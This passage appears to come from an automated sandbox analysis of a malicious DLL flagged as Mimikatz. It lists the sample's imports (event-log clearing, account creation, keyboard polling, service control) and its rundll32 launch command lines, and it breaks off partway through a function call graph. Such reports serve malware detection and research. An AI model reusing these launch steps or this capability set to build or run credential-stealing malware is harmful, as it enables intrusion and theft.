IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x97d6a | 0x98000 | f2eec4c92674f4bec9bdcb253ef8e843 | False | 0.4028127569901316 | data | 6.771282314042107 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rodata | 0x99000 | 0x2e50 | 0x3000 | 0ca3681ca0d1b13e402ba8d29971b5f2 | False | 0.28173828125 | data | 6.052273401613891 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rotext | 0x9c000 | 0x1ae92 | 0x1b000 | f8a1a6b3ce4b2119c3300ef12c912dca | False | 0.14991138599537038 | data | 5.991009639505281 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb7000 | 0x42780 | 0x43000 | ae9d5288d007a7a516a3de1e43c2155a | False | 0.09628979127798508 | data | 3.5855875325763815 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xfa000 | 0x9e7a0 | 0x32000 | 8cdca12a810109cded9bfdd6e8346f15 | False | 0.2992724609375 | data | 5.520529248289096 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x199000 | 0x10 | 0x1000 | 620f0b67a91f7f74151bc5be745b7110 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x19a000 | 0x803e | 0x9000 | f49f67bea9f3ac98de1c1a185b25a5eb | False | 0.5600314670138888 | data | 5.559657345526215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                DLLImport
                                                KERNEL32.dllProcess32First, GetSystemDirectoryA, TerminateProcess, OpenProcess, ExitProcess, GetVersion, DeviceIoControl, Beep, GetVersionExA, GetModuleFileNameA, WinExec, TerminateThread, GetTickCount, GetCommandLineA, FreeConsole, GetCurrentProcessId, GetConsoleProcessList, AttachConsole, GetWindowsDirectoryA, WideCharToMultiByte, MultiByteToWideChar, GlobalSize, QueryPerformanceFrequency, QueryPerformanceCounter, LoadLibraryW, GlobalMemoryStatusEx, GetDriveTypeA, ReleaseMutex, CreateMutexA, GetCurrentThread, GetEnvironmentVariableA, GetCurrentThreadId, CreatePipe, CopyFileA, lstrcpyW, Module32Next, lstrcmpiA, Module32First, CreateRemoteThread, GetProcessId, ResumeThread, OpenThread, Thread32Next, Thread32First, SuspendThread, Process32Next, GlobalMemoryStatus, GetComputerNameA, GetPrivateProfileStringA, SystemTimeToTzSpecificLocalTime, lstrcpynA, lstrcmpA, lstrcatA, CreateProcessA, GetProcAddress, lstrcpyA, CreateDirectoryA, GetLastError, DeleteFileA, GetCurrentProcess, IsWow64Process, SetFilePointer, WriteFile, CreateFileA, GetFileSize, ReadFile, lstrlenA, FreeLibrary, IsBadReadPtr, VirtualProtect, HeapReAlloc, HeapAlloc, GetProcessHeap, HeapFree, CancelIo, SetEvent, ResetEvent, CreateEventA, LocalAlloc, LocalReAlloc, LocalSize, LocalFree, Sleep, GetFileAttributesA, GetModuleHandleA, GetLocalTime, GlobalAlloc, GlobalLock, GlobalFree, GlobalUnlock, CreateThread, VirtualAlloc, EnterCriticalSection, LeaveCriticalSection, VirtualFree, DeleteCriticalSection, InitializeCriticalSection, InterlockedExchange, CreateToolhelp32Snapshot, GetFileAttributesExA, FileTimeToSystemTime, MoveFileA, SetFileAttributesA, RemoveDirectoryA, FindFirstFileA, FindNextFileA, FindClose, GetLogicalDriveStringsA, GetVolumeInformationA, GetPriorityClass, GetDiskFreeSpaceExA, WaitForSingleObject, CloseHandle, LoadLibraryA, GetSystemInfo
                                                USER32.dllSetRect, GetCursorPos, GetCursorInfo, PostMessageA, SetCursorPos, WindowFromPoint, SetCapture, MapVirtualKeyA, SystemParametersInfoA, ReleaseDC, BlockInput, DestroyCursor, LoadCursorA, GetDC, GetSystemMetrics, ChangeDisplaySettingsA, FindWindowA, ShowWindow, MoveWindow, GetWindowRect, SwapMouseButton, ExitWindowsEx, EnumWindows, GetKeyState, GetAsyncKeyState, GetForegroundWindow, GetWindowTextA, CharNextA, GetDesktopWindow, wsprintfA, EmptyClipboard, SetClipboardData, OpenClipboard, GetClipboardData, CloseClipboard, GetWindowLongA, PostQuitMessage, SetWindowLongA, LoadIconA, SetClassLongA, DestroyWindow, SetFocus, GetWindowTextLengthA, SetWindowTextA, SetDlgItemTextA, CreateDialogIndirectParamA, GetDlgItem, SetWindowPos, OpenInputDesktop, GetDlgItemTextA, CloseDesktop, GetThreadDesktop, GetUserObjectInformationA, SetThreadDesktop, GetWindowThreadProcessId, WaitForInputIdle, GetClassNameA, GetWindow, GetLastInputInfo, IsIconic, MessageBoxA, IsWindowVisible, GetMessageA, IsDialogMessageA, TranslateMessage, SendMessageA, DispatchMessageA
                                                GDI32.dllGetDeviceCaps, CreateDIBSection, CreateCompatibleDC, DeleteObject, DeleteDC, BitBlt, GetRegionData, CombineRgn, CreateRectRgnIndirect, GetDIBits, CreateCompatibleBitmap, SelectObject
                                                ADVAPI32.dllRegOpenKeyA, GetTokenInformation, LookupAccountSidA, AbortSystemShutdownA, RegCloseKey, RegOpenKeyExA, GetUserNameA, CloseEventLog, ClearEventLogA, OpenEventLogA, RegSetValueExA, RegCreateKeyA, StartServiceA, CloseServiceHandle, OpenServiceA, OpenSCManagerA, SetServiceStatus, DeleteService, FreeSid, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, AllocateAndInitializeSid, RegEnumValueA, RegEnumKeyExA, RegQueryValueExA, RegDeleteValueA, RegDeleteKeyA, RegQueryInfoKeyA, RegCreateKeyExA, UnlockServiceDatabase, ChangeServiceConfigA, LockServiceDatabase, ControlService, QueryServiceStatus, QueryServiceConfig2A, QueryServiceConfigA, EnumServicesStatusA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, CheckTokenMembership
                                                SHELL32.dllShellExecuteExA, SHGetFolderPathA, SHGetSpecialFolderPathA, SHGetFileInfoA, ShellExecuteA
                                                ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
                                                OLEAUT32.dllSysFreeString
                                                MFC42.DLL
                                                MSVCRT.dll_adjust_fdiv, _initterm, _onexit, __dllonexit, ??1type_info@@UAE@XZ, _snprintf, swprintf, _splitpath, strncpy, atol, strncat, realloc, fgets, srand, time, isdigit, _iob, _access, wcstombs, mbstowcs, _errno, _wcsupr, _strcmpi, _itoa, _strnicmp, fprintf, sscanf, getenv, vsprintf, exit, __CxxFrameHandler, memmove, ceil, _ftol, strstr, wcslen, wcscpy, sprintf, printf, fclose, fopen, remove, atoi, free, malloc, strncmp, _CIpow, floor, strchr, tolower, _CxxThrowException, _stricmp, _except_handler3, strrchr, _strlwr, wcsstr, rand, system
                                                MSVCP60.dll: ??0_Lockit@std@@QAE@XZ, ??1_Lockit@std@@QAE@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z, ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z, ?_Xlen@std@@YAXXZ, ?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z, ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z, ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z, ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z, ?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB, ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z, ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z, ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z, ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z, ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ, ?_Xran@std@@YAXXZ, ?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB, ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z, ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z, ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ, ??0Init@ios_base@std@@QAE@XZ, ??1Init@ios_base@std@@QAE@XZ, ??0_Winit@std@@QAE@XZ, ??1_Winit@std@@QAE@XZ
                                                WINMM.dll: mciSendStringA, waveInGetNumDevs
                                                WS2_32.dll: gethostname, inet_addr, getsockname, bind, getpeername, accept, listen, sendto, recvfrom, ntohs, inet_ntoa, send, closesocket, recv, select, gethostbyname, connect, setsockopt, WSAIoctl, WSACleanup, WSAStartup, __WSAFDIsSet, ioctlsocket, socket, htons
                                                iphlpapi.dll: GetIfTable
                                                dwmapi.dll: DwmIsCompositionEnabled
                                                SHLWAPI.dll: PathFindFileNameA, PathUnquoteSpacesA, PathRemoveArgsA, PathGetArgsA, SHDeleteKeyA
                                                WININET.dll: InternetGetConnectedState, InternetReadFile, HttpSendRequestA, InternetOpenUrlA, HttpOpenRequestA, InternetOpenA, InternetConnectA, InternetCloseHandle, HttpQueryInfoA
                                                NETAPI32.dll: NetUserSetInfo, NetUserAdd, NetUserGetLocalGroups, NetApiBufferFree, NetUserGetInfo, NetUserEnum, NetLocalGroupAddMembers, NetUserDel
                                                PSAPI.DLL: GetProcessMemoryInfo, GetModuleFileNameExA
                                                WTSAPI32.dll: WTSEnumerateSessionsA, WTSDisconnectSession, WTSLogoffSession, WTSQuerySessionInformationA, WTSFreeMemory, WTSQuerySessionInformationW
                                                Name | Ordinal | Address
                                                Shellex | 1 | 0x1001efd0
                                                No network behavior found

                                                Target ID:0
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\loaddll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:loaddll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll"
                                                Imagebase:0xb90000
                                                File size:126'464 bytes
                                                MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:1
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:2
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:3
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\ZfJheGhddq.dll,Shellex
                                                Imagebase:0x700000
                                                File size:61'440 bytes
                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:4
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1
                                                Imagebase:0x700000
                                                File size:61'440 bytes
                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:5
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:13
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                  Execution Graph

                                                  Execution Coverage:1%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:50%
                                                  Total number of Nodes:244
                                                  Total number of Limit Nodes:11
                                                  execution_graph 21756 1001efd0 12 API calls 21837 1001b660 GetModuleHandleA 21756->21837 21758 1001f1d6 21759 1001b660 3 API calls 21758->21759 21760 1001f258 21759->21760 21761 1001b660 3 API calls 21760->21761 21762 1001f2c9 21761->21762 21763 1001b660 3 API calls 21762->21763 21764 1001f3ed 21763->21764 21765 1001b660 3 API calls 21764->21765 21766 1001f54e 21765->21766 21767 1001b660 3 API calls 21766->21767 21768 1001f67b 21767->21768 21769 1001b660 3 API calls 21768->21769 21770 1001f729 21769->21770 21771 1001b660 3 API calls 21770->21771 21772 1001f7c3 21771->21772 21773 1001b660 3 API calls 21772->21773 21774 1001f80d 21773->21774 21775 1001b660 3 API calls 21774->21775 21776 1001f893 21775->21776 21777 1001b660 3 API calls 21776->21777 21778 1001f93e GetCurrentThreadId PostThreadMessageA 21777->21778 21779 1001f959 InitializeSecurityDescriptor SetSecurityDescriptorDacl GetCommandLineA CreateMutexA 21778->21779 21781 1001fa63 21779->21781 21782 1001fa52 GetLastError 21779->21782 21784 1001fe86 21781->21784 21785 1001fadf 21781->21785 21782->21781 21783 1001fec6 21782->21783 21841 1001ab20 21784->21841 21786 1001fc40 21785->21786 21787 1001faeb strstr 21785->21787 21786->21783 21789 1001fc4c 21786->21789 21790 1001fb07 Sleep 21787->21790 21791 1001fb18 21787->21791 21856 1001e440 15 API calls 21789->21856 21800 1001ef90 24 API calls 21790->21800 21851 1001fee0 OpenSCManagerA OpenServiceA CloseServiceHandle CloseServiceHandle CloseServiceHandle 21791->21851 21792 1001fea1 21796 1001feb5 Sleep 21792->21796 21797 1001fea8 21792->21797 21848 1001ef90 21796->21848 21859 1001e440 15 API calls 21797->21859 21799 1001fc5f 21799->21783 21808 1001fc98 sprintf 21799->21808 21800->21790 21801 1001fb22 21805 1001fbb6 sprintf 21801->21805 21806 1001fb2d 21801->21806 21803 1001feb2 21803->21796 21853 1001e440 15 API calls 21805->21853 21811 1001fb52 OpenSCManagerA 21806->21811 21825 1001fba5 Sleep 21806->21825 21813 
1001fd01 21808->21813 21809 1001fc15 21854 1001ff30 9 API calls 21809->21854 21815 1001fb65 OpenServiceA 21811->21815 21811->21825 21819 1001fd0a GetModuleFileNameA sprintf 21813->21819 21830 1001fe75 Sleep 21813->21830 21814 1001fc31 21855 1001ea60 9 API calls 21814->21855 21816 1001fba2 CloseServiceHandle 21815->21816 21817 1001fb7f StartServiceA 21815->21817 21816->21825 21822 1001fba0 CloseServiceHandle 21817->21822 21823 1001fb8d CloseServiceHandle CloseServiceHandle 21817->21823 21818 1001ef90 24 API calls 21818->21825 21828 1001fdbc Sleep 21819->21828 21821 1001fc39 ExitProcess 21822->21816 21852 1001ea60 9 API calls 21823->21852 21825->21818 21827 1001ef90 24 API calls 21827->21830 21831 1001fe12 21828->21831 21829 1001fb99 ExitProcess 21830->21827 21857 1001e800 GetModuleHandleA LoadLibraryA GetProcAddress CloseHandle 21831->21857 21833 1001fe2d sprintf 21834 1001fe69 21833->21834 21858 1001ea60 9 API calls 21834->21858 21836 1001fe6e ExitProcess 21838 1001b670 LoadLibraryA 21837->21838 21839 1001b67b GetProcAddress 21837->21839 21838->21839 21840 1001b689 21838->21840 21839->21758 21840->21758 21860 10014700 LoadLibraryA GetProcAddress #823 #823 RegOpenKeyExA 21841->21860 21843 1001abc8 lstrlenA 21844 1001ac37 lstrlenA 21843->21844 21845 1001abd6 CreateFileA 21843->21845 21844->21792 21846 1001ac30 CloseHandle 21845->21846 21847 1001ac17 GetFileSize ReadFile 21845->21847 21846->21844 21847->21846 21888 1002bdb0 LoadLibraryA GetProcAddress 21848->21888 21850 1001efa7 WaitForSingleObject CloseHandle 21850->21796 21851->21801 21852->21829 21853->21809 21854->21814 21855->21821 21856->21799 21857->21833 21858->21836 21859->21803 21861 10014881 21860->21861 21862 10014899 21860->21862 21886 10014c12 RegCloseKey RegCloseKey 21861->21886 21865 10014a03 RegQueryValueExA 21862->21865 21866 100148c2 RegQueryValueExA 21862->21866 21867 10014ba2 wsprintfA 21862->21867 21868 10014908 RegQueryValueExA 21862->21868 21869 10014acc RegEnumValueA 21862->21869 21870 
10014bcf wsprintfA 21862->21870 21871 10014a30 RegEnumKeyExA 21862->21871 21872 10014bf5 lstrcatA 21862->21872 21873 10014b58 wsprintfA 21862->21873 21874 10014b7d wsprintfA 21862->21874 21875 100149bc RegQueryValueExA 21862->21875 21883 100148ac 21862->21883 21884 100148f2 21862->21884 21865->21884 21866->21884 21867->21872 21876 10014934 21868->21876 21868->21884 21880 10014b44 21869->21880 21869->21884 21870->21872 21879 10014a78 wsprintfA 21871->21879 21871->21884 21872->21843 21873->21872 21874->21872 21878 100149e8 wsprintfA 21875->21878 21875->21884 21876->21884 21885 1001494e strncat strncat strchr 21876->21885 21877 10014894 #825 #825 21877->21843 21878->21884 21879->21871 21880->21867 21880->21870 21880->21872 21880->21873 21880->21874 21883->21865 21883->21866 21883->21867 21883->21868 21883->21870 21883->21872 21883->21873 21883->21874 21883->21875 21883->21884 21887 10014c12 RegCloseKey RegCloseKey 21884->21887 21885->21876 21886->21877 21887->21877 21889 1002bdf3 CreateThread LoadLibraryA GetProcAddress 21888->21889 21890 1002be35 CloseHandle 21889->21890 21891 1002bcb0 21889->21891 21890->21850 21897 10010ca0 21891->21897 21893 1002bcee LoadLibraryA GetProcAddress 21894 1002bd5e 21893->21894 21895 1002bd69 21894->21895 21898 1002bfa0 14 API calls 21894->21898 21897->21893 21898->21895 21899 1002d2eb 21900 1002d2fe 21899->21900 21905 1002d307 21899->21905 21902 1002d32f 21900->21902 21914 100214b0 21900->21914 21901 1002d323 21928 1002d240 malloc _initterm free 21901->21928 21905->21900 21905->21901 21905->21902 21906 1002d32b 21906->21900 21908 1002d34f 21908->21902 21910 1002d358 21908->21910 21909 1002d347 21929 1002d240 malloc _initterm free 21909->21929 21930 1002d240 malloc _initterm free 21910->21930 21913 1002d360 21913->21902 21915 10021588 21914->21915 21916 100214be 21914->21916 21915->21902 21915->21908 21915->21909 21931 10021410 _access 21916->21931 21918 100214c3 _access 21919 100214e0 WinExec _access 21918->21919 21920 10021521 Sleep 
21918->21920 21919->21920 21921 10021500 WinExec Sleep _access 21919->21921 21954 10020f70 21920->21954 21921->21920 21921->21921 21923 1002152d CreateThread 21924 10021551 CreateThread 21923->21924 21925 1002154e CloseHandle 21923->21925 22038 10020fd0 96 API calls 21923->22038 21926 10021566 CloseHandle 21924->21926 21927 10021569 Shellex 21924->21927 22037 100211c0 41 API calls 21924->22037 21925->21924 21926->21927 21927->21915 21928->21906 21929->21908 21930->21913 21932 10021434 21931->21932 21933 1002142b 21931->21933 21932->21918 21959 100209d0 AllocateAndInitializeSid 21933->21959 21936 1002143d GetModuleFileNameA 21936->21932 21937 10021453 21936->21937 21938 1002145b ShellExecuteExA 21937->21938 21939 10021497 GetLastError 21938->21939 21940 1002149f exit 21938->21940 21939->21938 21941 100214b0 21940->21941 21942 10021588 21941->21942 21943 10021410 123 API calls 21941->21943 21942->21918 21944 100214c3 _access 21943->21944 21945 100214e0 WinExec _access 21944->21945 21946 10021521 Sleep 21944->21946 21945->21946 21947 10021500 WinExec Sleep _access 21945->21947 21948 10020f70 8 API calls 21946->21948 21947->21946 21947->21947 21949 1002152d CreateThread 21948->21949 21950 10021551 CreateThread 21949->21950 21951 1002154e CloseHandle 21949->21951 21985 10020fd0 _access 21949->21985 21952 10021566 CloseHandle 21950->21952 21953 10021569 Shellex 21950->21953 21962 100211c0 _access 21950->21962 21951->21950 21952->21953 21953->21942 22034 10020f30 GetModuleFileNameA 21954->22034 21956 10020f7a 21957 10020f81 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@ 21956->21957 21958 10020f9f GetLastError ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@ 21956->21958 21957->21923 21958->21923 21960 10020a36 21959->21960 21961 10020a1a 
CheckTokenMembership FreeSid 21959->21961 21960->21932 21960->21936 21961->21960 21963 100212e1 Sleep CreateFileA 21962->21963 21964 100211f8 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 21962->21964 21965 10021310 MessageBoxA 21963->21965 21966 10021327 GetFileSize 21963->21966 21967 10021228 ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 21964->21967 21968 1002124c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 21964->21968 21969 100213f0 21965->21969 21970 10021335 MessageBoxA 21966->21970 21971 1002134e VirtualAlloc 21966->21971 21967->21968 22030 10020810 22 API calls 21968->22030 21973 100213e9 CloseHandle 21970->21973 21974 10021369 MessageBoxA 21971->21974 21975 1002137d ReadFile 21971->21975 21973->21969 21974->21973 21978 100213c7 MessageBoxA VirtualFree 21975->21978 21979 1002138e 21975->21979 21976 1002128d 21977 100212a5 21976->21977 21980 100212ab #825 21976->21980 21977->21963 21982 100212d8 #825 21977->21982 21984 100212d2 21977->21984 21978->21973 21979->21978 21981 10021393 CloseHandle 21979->21981 21980->21977 21983 100213a0 VirtualFree 21981->21983 21982->21963 21984->21963 21986 10021123 21985->21986 21987 10021009 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 21985->21987 21990 100209d0 3 API calls 21986->21990 21988 10021063 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 21987->21988 21989 1002103f ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 21987->21989 22031 10020810 22 API calls 21988->22031 21989->21988 21991 10021128 21990->21991 21993 1002114e GetModuleFileNameA 21991->21993 21994 1002112c 21991->21994 21997 10021163 21993->21997 21998 10021131 21993->21998 22032 10020c20 41 API calls 21994->22032 21995 100210b4 21999 100210d3 #825 21995->21999 22001 100210cd 21995->22001 22000 1002116e ShellExecuteExA 21997->22000 21999->22001 22003 100211a6 
GetLastError 22000->22003 22004 100211ae exit 22000->22004 22002 10021118 Sleep 22001->22002 22005 1002110f #825 22001->22005 22007 10021109 22001->22007 22002->21986 22003->22000 22006 100211c0 _access 22004->22006 22005->22002 22008 100212e1 Sleep CreateFileA 22006->22008 22009 100211f8 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 22006->22009 22007->22002 22010 10021310 MessageBoxA 22008->22010 22011 10021327 GetFileSize 22008->22011 22012 10021228 ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 22009->22012 22013 1002124c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 22009->22013 22014 100213f0 22010->22014 22015 10021335 MessageBoxA 22011->22015 22016 1002134e VirtualAlloc 22011->22016 22012->22013 22033 10020810 22 API calls 22013->22033 22019 100213e9 CloseHandle 22015->22019 22020 10021369 MessageBoxA 22016->22020 22021 1002137d ReadFile 22016->22021 22018 1002128d 22024 100212ab #825 22018->22024 22027 100212a5 22018->22027 22019->22014 22020->22019 22022 100213c7 MessageBoxA VirtualFree 22021->22022 22023 1002138e 22021->22023 22022->22019 22023->22022 22025 10021393 CloseHandle 22023->22025 22024->22027 22028 100213a0 VirtualFree 22025->22028 22026 